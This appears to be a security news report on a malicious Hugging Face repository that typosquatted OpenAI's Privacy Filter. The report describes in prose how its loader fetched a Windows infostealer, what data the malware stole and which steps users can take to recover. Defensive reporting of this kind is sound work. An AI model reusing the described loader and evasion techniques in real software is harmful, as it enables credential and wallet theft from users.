**Hugging Face**, a platform for sharing AI models and datasets, was recently exploited to distribute malware. A malicious repository, impersonating **OpenAI**’s legitimate “Privacy Filter,” reached the platform’s trending list and infected Windows users with information-stealing malware. ### Deceptive Tactics The rogue repository briefly held the #1 position on **Hugging Face**, amassing 244,000 downloads before the platform intervened. Researchers at **HiddenLayer**, a firm specializing in AI and ML model security, discovered the malicious repository, named `Open-OSS/privacy-filter`, on May 7. "The repository had typosquatted **OpenAI**'s legitimate Privacy Filter release, copied its model card nearly verbatim, and shipped a `loader.py` file that fetches and executes infostealer malware on Windows machines," the researchers explained.  *Instructions from the malicious repository Source: HiddenLayer* ### Technical Details of the Attack The `loader.py` Python script contained seemingly harmless AI-related code. However, it secretly disabled SSL verification, decoded a base64 URL pointing to an external resource, and fetched a JSON payload containing a PowerShell command. The command, executed in an invisible window, downloads a batch file (`start.bat`) that performs privilege escalation, downloads the final payload (`sefirah`), adds it to **Microsoft Defender**'s exclusions, and executes it. ### Infostealer Capabilities The final payload is a Rust-based infostealer that targets a wide range of sensitive data, including: * Browser data from Chromium- and Gecko-based browsers (e.g., cookies, saved passwords, encryption keys, browsing data, session tokens) * Discord tokens, local databases, and master keys * Cryptocurrency wallets and wallet browser extensions * SSH, FTP, and VPN credentials and configuration files, including FileZilla * Sensitive local files and wallet seeds/keys * System information * Multi-monitor screenshots The stolen data is compressed and exfiltrated to a command-and-control (C2) server at `recargapopular[.]com`. ### Anti-Analysis Measures **HiddenLayer** emphasized the malware’s sophisticated anti-analysis features, which include checks for virtual machines, sandboxes, debuggers, and analysis tools designed to evade detection. The exact number of victims remains unclear. Researchers noted that many of the 667 accounts that liked the repository appeared to be auto-generated, and the 244,000 download count may have been inflated. Further investigation revealed other repositories using the same malicious loader infrastructure, with overlaps observed in an npm typosquatting campaign distributing the WinOS 4.0 implant. ### Mitigation Steps Users who downloaded files from the malicious repository are strongly advised to: * Reimage the affected machine. * Rotate all stored credentials. * Replace cryptocurrency wallets and seed phrases. * Invalidate browser sessions and tokens. This incident highlights the ongoing abuse of **Hugging Face** to host malicious models, despite the platform's security measures. Vigilance and proactive security measures are crucial for users of AI model repositories. <a rel="noopener nofollow" href="https://hubs.li/Q04crVgD0"><img alt="article image" src="https://www.bleepstatic.com/c/p/autonomous-validation2.jpg"></a> ## <a rel="noopener nofollow" href="https://hubs.li/Q04crVgD0">99% of What Mythos Found Is Still Unpatched.</a> AI chained four zero-days into one exploit that bypassed both renderer and OS sandboxes. A wave of new exploits is coming. At the Autonomous Validation Summit (May 12 & 14), see how autonomous, context-rich validation finds what's exploitable, proves controls hold, and closes the remediation loop. <a rel="noopener nofollow" href="https://hubs.li/Q04crVgD0">Claim Your Spot</a>